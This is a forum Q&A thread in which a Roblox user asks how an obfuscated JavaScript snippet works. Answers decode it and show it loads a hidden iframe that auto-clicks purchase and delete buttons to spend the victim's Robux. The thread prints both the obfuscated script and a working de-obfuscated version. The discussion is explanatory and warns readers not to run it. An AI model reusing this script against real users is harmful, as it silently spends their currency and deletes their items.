Can someone tell me how this code works?
Question
I'm a user on the game Roblox and someone gave me this to run. I know it's bad because I disabled the part that would take someone's money by buying the tshirt, which is the line on the bottom of the code that reads /*iframe[_0xebe7[20]] = whe;*/ .
How does the variable _0x2d54 even work? I've never seen this type of coding before and it puzzles me because I want to understand it.
I'm not sure how the hex coding works, but I came across a similar post: Decode this strange Javascript
var _0x2d54=["\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x72\x6F\x62\x6C\x6F\x78\x2E\x63\x6F\x6D\x2F\x66\x6F\x72\x2D\x74\x72\x61\x64\x65\x73\x2D\x69\x74\x65\x6D\x3F\x69\x64\x3D\x36\x37\x39\x32\x38\x39\x31\x38","\x69\x66\x72\x61\x6D\x65","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x63\x74\x6C\x30\x30\x5F\x63\x70\x68\x52\x6F\x62\x6C\x6F\x78\x5F\x50\x75\x72\x63\x68\x61\x73\x65\x57\x69\x74\x68\x52\x6F\x62\x75\x78\x42\x75\x74\x74\x6F\x6E","\x63\x74\x6C\x30\x30\x5F\x63\x70\x68\x52\x6F\x62\x6C\x6F\x78\x5F\x50\x72\x6F\x63\x65\x65\x64\x57\x69\x74\x68\x50\x75\x72\x63\x68\x61\x73\x65\x42\x75\x74\x74\x6F\x6E","\x63\x74\x6C\x30\x30\x5F\x63\x70\x68\x52\x6F\x62\x6C\x6F\x78\x5F\x62\x74\x6E\x44\x65\x6C\x65\x74\x65","\x77\x69\x64\x74\x68","\x31","\x68\x65\x69\x67\x68\x74","\x7A\x2D\x69\x6E\x64\x65\x78","\x73\x74\x79\x6C\x65","\x2D\x31","\x63\x6F\x6E\x74\x65\x6E\x74\x44\x6F\x63\x75\x6D\x65\x6E\x74","\x69\x66\x72\x61\x6D\x65\x20\x6C\x6F\x61\x64\x65\x64","\x6C\x6F\x67","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x63\x6F\x6E\x66\x69\x72\x6D\x44\x65\x6C\x65\x74\x65","\x63\x6F\x6E\x74\x65\x6E\x74\x57\x69\x6E\x64\x6F\x77","\x63\x6C\x69\x63\x6B","\x73\x72\x63","\x6F\x6E\x6C\x6F\x61\x64","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x62\x6F\x64\x79"];
var _0xebe7=[_0x2d54[0],_0x2d54[1],_0x2d54[2],_0x2d54[3],_0x2d54[4],_0x2d54[5],_0x2d54[6],_0x2d54[7],_0x2d54[8],_0x2d54[9],_0x2d54[10],_0x2d54[11],_0x2d54[12],_0x2d54[13],_0x2d54[14],_0x2d54[15],_0x2d54[16],_0x2d54[17],_0x2d54[18],_0x2d54[19],_0x2d54[20],_0x2d54[21],_0x2d54[22]];
var shirt=_0xebe7[0];
var iframe=document[_0xebe7[2]](_0xebe7[1]);
var b1=_0xebe7[3];
var b2=_0xebe7[4];
var b3 =_0xebe7[5];
iframe[_0xebe7[6]] = _0xebe7[7];
iframe[_0xebe7[8]] = _0xebe7[7];
iframe[_0xebe7[10]][_0xebe7[9]] = _0xebe7[11];
function whe(){
var _0x9b91x8 = iframe[_0xebe7[12]];
console[_0xebe7[14]](_0xebe7[13]);
if (_0x9b91x8[_0xebe7[15]](b3)){
iframe[_0xebe7[17]][_0xebe7[16]] = (function (){
return function (){
return true;
}
;}
)();
iframe[_0xebe7[12]][_0xebe7[15]](b3)[_0xebe7[18]]();
} else {
if(_0x9b91x8[_0xebe7[15]](b2)){
iframe[_0xebe7[12]][_0xebe7[15]](b2)[_0xebe7[18]]();
} else {
if(_0x9b91x8[_0xebe7[15]](b1)){
iframe[_0xebe7[12]][_0xebe7[15]](b1)[_0xebe7[18]]();
}
}
}
}
iframe[_0xebe7[19] ]= shirt;
/*iframe[_0xebe7[20]] = whe;*/
document[_0xebe7[22]][_0xebe7[21]](iframe);
4 answers
solution1
3 ACCPTED 2013-06-05 20:31:31
You'll have to work hard to understand this code. The developers made it hard to understand -- on purpose.
They obfuscated the code to slow down others who would copy it.
You can start by changing the variables and running the code to see what changes.
That will give you hints as to what that particular variable does.
But there are lots of variables.
Edit: Actually, I take that back. Try to understand the code as much as you can first without running it. As Mathew points out below, it could be malware. Then, once you have a better idea, poke it carefully.
solution2
2 2013-06-05 20:35:16
It contains an array of multiple values.
[
"http://www.roblox.com/for-trades-item?id=67928918",
"iframe",
"createElement",
"ctl00_cphRoblox_PurchaseWithRobuxButton",
"ctl00_cphRoblox_ProceedWithPurchaseButton",
"ctl00_cphRoblox_btnDelete",
"width",
"1",
"height",
"z-index",
"style",
"-1",
"contentDocument",
"iframe loaded",
"log",
"getElementById",
"confirmDelete",
"contentWindow",
"click",
"src",
"onload",
"appendChild",
"body"
]
Looks to me like this is a nasty script and you shouldn't run it.
solution3
2 2013-06-05 20:56:38
Basically, it adds an invisibile iframe to the current page with http://www.roblox.com/for-trades-item?id=67928918 as the source. It then attempts to:
- Click the "Delete" button without a confirmation
- Click the "Purchase" button
- Click the "Robux" button
A lot of browsers protect you from code generated click events like this, but you still shouldn't run it.
De-obfuscated:
var iframe = document.createElement("iframe");
iframe.width = 1;
iframe.heigth = 1;
iframe.style.zIndex = -1;
iframe.src = "http://www.roblox.com/for-trades-item?id=67928918";
function whe() {
var cDoc = iframe.contentDocument;
console.log("iframe loaded");
if (cDoc.getElementById("ctl00_cphRoblox_btnDelete")) {
iframe.contentWindow.confirmDelete = (function () {
return function () {
return true;
};
})();
iframe.contentDocument.getElementById("ctl00_cphRoblox_btnDelete").click();
} else {
if (cDoc.getElementById("ctl00_cphRoblox_ProceedWithPurchaseButton")) {
iframe.contentDocument.getElementById("ctl00_cphRoblox_ProceedWithPurchaseButton").click();
} else {
if (cDoc.getElementById("ctl00_cphRoblox_PurchaseWithRobuxButton")) {
iframe.contentDocument.getElementById("ctl00_cphRoblox_PurchaseWithRobuxButton").click();
}
}
}
}
iframe.onload = whe;
document.body.appendChild(iframe);
solution4
0 2013-06-05 20:35:03
My comment is probably going to get removed because it's an answer not a comment.
Its obfuscated you can console.log(_0xebe7) to see all the values of the variables. To get the values and improve readability a bit you can use http://jsbeautifier.org
The technical post webpages of this site follow the CC BY-SA 4.0 protocol. If you need to reprint, please indicate the site URL or the original address.Any question please contact:yoyou2525@163.com.